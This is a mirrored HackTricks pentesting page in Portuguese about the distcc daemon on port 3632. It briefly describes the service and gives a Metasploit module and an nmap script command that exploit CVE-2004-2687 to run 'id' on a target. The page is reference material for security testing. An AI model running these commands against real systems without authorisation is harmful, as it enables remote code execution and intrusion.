2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-30 06:53:11 +00:00
hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Informações Básicas

Distcc é uma ferramenta que aprimora o processo de compilação utilizando o poder de processamento ocioso de outros computadores na rede. Quando o distcc é configurado em uma máquina, essa máquina é capaz de distribuir suas tarefas de compilação para outro sistema. Este sistema receptor deve estar executando o daemon distccd e deve ter um compilador compatível instalado para processar o código enviado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável ao CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Não acredito que o Shodan detecte este serviço.

Recursos

Post criado por Álex B (@r1p)

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: